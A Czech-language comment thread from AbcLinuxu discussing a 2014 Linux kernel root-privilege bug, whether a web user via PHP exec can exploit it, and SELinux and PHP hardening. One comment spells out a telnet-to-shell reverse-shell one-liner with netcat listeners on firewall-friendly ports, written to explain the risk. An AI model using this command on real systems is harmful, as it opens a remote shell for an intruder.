Portál AbcLinuxu, 5. května 2025 18:54

Nástroje: Začni sledovat (2) ?Zašle upozornění na váš email při vložení nového komentáře.

Vložit další komentář
6.6.2014 13:36 sonicpp | skóre: 7
Rozbalit Rozbalit vše Re: Chyba v Linuxu umožňuje získat práva roota
Odpovědět | Sbalit | Link | Blokovat | Admin
Co zprávička, to závažná chyba :-/
little.owl avatar 6.6.2014 14:33 little.owl | skóre: 22 | blog: Messy_Nest | Brighton/Praha
Rozbalit Rozbalit vše Re: Chyba v Linuxu umožňuje získat práva roota
Odpovědět | Sbalit | Link | Blokovat | Admin
To je pak i v CentOS/RHEL 6.x .... :-\
A former Red Hat freeloader.
6.6.2014 14:33 696
Rozbalit Rozbalit vše Re: Chyba v Linuxu umožňuje získat práva roota
Odpovědět | Sbalit | Link | Blokovat | Admin
Tož su klidný. Kdyby se ke každé bezpečností chybě ve woknech vydávala zprávička, tak bych nečetl nic jiného. Na pracovním compu to kolegům každou lichou středu napere 100 – 140MB aktualizací a dám ruku do ohně za to, že to nejsou vylepšeníí nebo nové verze programů :-)
6.6.2014 15:05 petrfm
Rozbalit Rozbalit vše Re: Chyba v Linuxu umožňuje získat práva roota
pulka z toho jsou databaze potencialne skodliveho SW a lidi... teroristicky software :-D
6.6.2014 15:11 marek_hb
Rozbalit Rozbalit vše Re: Chyba v Linuxu umožňuje získat práva roota
Odpovědět | Sbalit | Link | Blokovat | Admin
Sice cednik, ale máme ho zadarmo :)
12.6.2014 12:10 j
Rozbalit Rozbalit vše Re: Chyba v Linuxu umožňuje získat práva roota
Furt lepsi nez stenej cednik za penize ...
6.6.2014 16:52 Peter
Rozbalit Rozbalit vše Re: Chyba v Linuxu umožňuje získat práva roota
Odpovědět | Sbalit | Link | Blokovat | Admin
Pri popise týchto chýb uvádzajú "local user ..." a mňa zaujíma jedna vec - musí to byť reálny používateľ, teda ten s "/bin/bash" alebo tieto chyby môže zneužiť aj útočník povedzme cez apache, ktorý má "/sbin/nologin" a to napríklad tak, že sa mu podarí hodiť na server nejaké php s exec?
Jendа avatar 6.6.2014 17:32 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: Chyba v Linuxu umožňuje získat práva roota
Stačí to PHP s exec.
Max avatar 6.6.2014 18:07 Max | skóre: 72 | blog: Max_Devaine
Rozbalit Rozbalit vše Re: Chyba v Linuxu umožňuje získat práva roota
Za předpokladu, že člověk nemá ošetřen server pomocí dalších nástrojů (selinux apod.).
Zdar Max
Měl jsem sen ... :(
6.6.2014 22:25 Jan R.
Rozbalit Rozbalit vše Re: Chyba v Linuxu umožňuje získat práva roota
Zrovna futexy sa SELinuxom asi dost dobre obmedzit nedaju, lebo su treba prakticky vsade... (exec zrejme obmedzit ide - akurat ci to staci...)
6.6.2014 18:27 lertimir | skóre: 64 | blog: Par_slov
Rozbalit Rozbalit vše Re: Chyba v Linuxu umožňuje získat práva roota
A obecně jeden příkaz stačí. Třeba 
/bin/telnet IP 80 | /bin/sh | /bin/telnet IP 25
vyrobí "reverse channel" z napadeného systému na IP útočníka. Pokud u něj čekají dvě instance netcat na dva telnetové kanály 
nc –l –n –v –p 80 (25)
tak má útočník shell. Pak přes jeden netcat pošle příkaz, ten prohučí přes shell a zobrazí se do druhého netcatu. Porty 80 a 25 jsou zvoleny proto, že je většina firewallů povoluje. Nebo to může být 80 a 443.
6.6.2014 20:23 Sten
Rozbalit Rozbalit vše Re: Chyba v Linuxu umožňuje získat práva roota
Pokud je to PHP nastavené tak, že spustí cokoliv, tak je to totéž, jako kdyby mělo shell. Proto minimum by měl být alespoň safe_mode, ale vhodnější je exec a podobné funkce úplně zakázat.
8.6.2014 11:58 trekker.dk | skóre: 72
Rozbalit Rozbalit vše Re: Chyba v Linuxu umožňuje získat práva roota
Proto minimum by měl být alespoň safe_mode
... tak to snad ne, že ne? Z dokumentace PHP: "This feature has been DEPRECATED as of PHP 5.3.0 and REMOVED as of PHP 5.4.0." Krom toho například v Debianu ohledně opravování chyb v PHP píší: "PHP security issues are typically triaged with different priorities based on the particulars of the issue. Issues involving features that are broken as designed (safe mode, register globals, etc) are completely ignored."
Quando omni flunkus moritati
8.6.2014 16:51 Yenda
Rozbalit Rozbalit vše Re: Chyba v Linuxu umožňuje získat práva roota
Odpovědět | Sbalit | Link | Blokovat | Admin
Doufam, ze někdo forkne Linux, nazve to LibreLinux a smaze nejdriv futexy a hned potom i zbytek celého kódu. Kód ktery neexistuje nemůže obsahovat chyby, vime?
pavlix avatar 8.6.2014 17:25 pavlix | skóre: 54 | blog: pavlix
Rozbalit Rozbalit vše Re: Chyba v Linuxu umožňuje získat práva roota
Jak víš, že to už někdo neudělal?
Já už tu vlastně ani nejsem. Abclinuxu umřelo.
8.6.2014 18:28 Yenda
Rozbalit Rozbalit vše Re: Chyba v Linuxu umožňuje získat práva roota
V tom případě, v duchu OSS a free software, forknout jeste aspoň dvakrát. A za fork forku jsou body navic.
pavlix avatar 8.6.2014 18:41 pavlix | skóre: 54 | blog: pavlix
Rozbalit Rozbalit vše Re: Chyba v Linuxu umožňuje získat práva roota
Enjoy.
Já už tu vlastně ani nejsem. Abclinuxu umřelo.

Založit nové vláknoNahoru

Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

ISSN 1214-1267, (c) 1999-2007 Stickfish s.r.o.